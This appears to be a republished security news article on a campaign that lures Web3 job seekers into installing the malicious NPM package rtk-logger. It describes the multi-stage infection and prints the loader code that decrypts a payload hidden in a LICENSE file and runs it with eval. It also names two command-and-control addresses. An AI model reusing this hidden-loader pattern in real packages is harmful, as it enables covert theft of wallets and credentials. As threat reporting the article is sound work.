A sophisticated cybercriminal operation disguised as a Ukrainian Web3 development team has been targeting job seekers through weaponized NPM packages, security researchers warn.
The attack leverages fake interview processes to trick unsuspecting candidates into downloading and executing malicious code that steals cryptocurrency wallets, browser data, and sensitive personal information.
The campaign centers around a seemingly legitimate GitHub repository called “EvaCodes-Community/UltraX,” which attackers present to prospective employees during first-round interviews.
Victims are instructed to clone and run the repository locally as part of a technical assessment. However, the project contains a malicious NPM dependency designed to harvest sensitive data from the target’s system.
On August 9, 2025, a community member approached SlowMist researchers after becoming suspicious of the repository’s contents during an interview process.
The security team’s subsequent analysis revealed the presence of a backdoor embedded within the project’s dependencies, confirming the malicious nature of what appeared to be a standard Web3 development repository.
SlowMist analysts identified that the attack initially used the NPM package “[email protected],” which was later replaced with “[email protected]” after the original package was removed by NPM’s security team.
The newer package, published on August 8, 2025, contains heavily obfuscated code designed to evade detection while maintaining the same malicious functionality.
The threat extends beyond individual victims, as the researchers discovered that two additional GitHub accounts had forked the malicious repository, suggesting a broader campaign targeting multiple potential victims across the Web3 job market.
Infection Mechanism and Code Execution
The malware’s infection vector relies on social engineering rather than technical exploitation, making it particularly dangerous for job seekers in the competitive Web3 space.
Once the victim clones the repository and executes “npm install,” the malicious rtk-logger package automatically triggers its payload through a sophisticated multi-stage process.
.webp "Ukrainian Web3team Weaponizing NPM Package to Attack Job Seekers and Steal Sensitive Data 3")
The package’s core malicious code resides in “/rtk-logger/lib/utils/smtp-connection/index.js,” which uses AES-256-CBC decryption to unlock obfuscated payloads stored in the LICENSE file.
The decryption process employs hardcoded keys and initialization vectors, allowing the malware to execute without additional network communication during initial deployment.
const fs = require('fs');
const path = require('path');
const parseLib = require('./parse')
const filePath = path.join(__dirname, 'LICENSE');
fs.readFile(filePath, 'utf8', (_, data) => {
try {
eval(parseLib(data))
} catch (err) {
console.error('Error during parsing/eval:', err);
}
})After successful decryption, the malware establishes connections to command-and-control servers at 144.172.112.106 and 172.86.64.67, enabling remote access and data exfiltration capabilities while maintaining persistence through various system-level modifications.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
